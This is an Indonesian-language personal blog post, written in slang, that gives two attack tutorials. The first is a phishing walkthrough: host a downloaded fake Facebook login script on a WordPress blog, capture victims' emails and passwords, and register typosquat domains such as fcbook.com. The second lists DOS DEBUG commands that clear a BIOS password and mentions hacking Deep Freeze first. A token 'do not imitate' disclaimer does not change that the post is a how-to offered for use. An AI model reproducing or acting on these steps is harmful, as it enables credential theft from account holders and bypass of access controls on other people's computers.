teknik phising ntu lumayan gampang tur resiko tinggi,lawanya hak paten mo gimana!sebelum lanjut penulis memperingatkan!penulis hanya ingin memperingatkan kepada pembaca bahwa teknik ini jangan di tiru sangat berbahaya.di mana penulis memperingatkan juga ,apabila pembaca ingin mengunjungi atau masuk ke situs web terutama yang ada akun anda cek dulu apakah anda menulis url di addess bar anda benar.tapi kalo facebook,google kayanya teknologinya lebih canggih... tau ah ngrepotin.
gini caranya anda harus tau program php (apaan ntu?penjual hp kale!!) ndan database(gak tau).
1.daftar di http://wordpress.com/ daftar buat bikin blog
2.ini khusus yang ahli blog wordpress .ganti templatesnya pakai downloadan di tautan url berikut
http://downloads.ziddu.com/downloadfile/5023245/scriptFakeloginFacebook.rar.html
3.ganti pakai templates itu n googling cari tau cara nyimpen password n email n link ke facebook aslinya dengan embel2 salah password.
4.ganti domain jadi fcbook.com,fcebook.com,facbook.com.tapi menurut saya gak penting sekali lagi ini hanya sebagai pemberitahuan bahwa user harus hati2.dan jangan pernah mencoba karena berbahaya penulis saja nggak pernah nyoba.maless!!!!!!

☂cara bobol password bios pake hapus passwordnya☂
mungkin yang udah ahli mah biasa ya!!tapi yang belum gimana?ini khusus yang belum bisa.soalnya penulis lagi males nulis n ngantuk abiss pengen pipis!!upps....?gini...Password BIOS dipake user untuk melindungi seting BIOS di kompi. Dan bila anda ingin mereset password pada BIOS tidak perlu susah-susah untuk mengkoneksikan ato copot baterai CMOS nya, dengan sedikit trik pada DOS, anda bisa mereset password BIOS tersebut.

Caranya gini :

1. Reboot komputer dan jalankan dengan modus MS-DOS mode (pake F8)

2. Gunakan pilihan “command prompt only”.

3. Pada C:\> prompt, ketik : DEBUG tekan enter. Anda akan melihat tanda (-) pada DEBUG prompt.

4. Ketik : 0 70 2e pada DEBUG prompt akan ditampilkan seperti -0 70 2e. Tekan enter

5. Ketik : 0 71 ff tekan enter

6. Ketik : Q tekan enter, maka anda akan keluar dari DEBUG prompt dan kembali pada C:\> prompt.
7.restart tapi kalian harus hack dulu deepfrezze yang pake cara kemaren biar gak sia2 latihanya.

pendapat: 
0 komentar

Poskan Komentar

look ! bugs my blog

visitors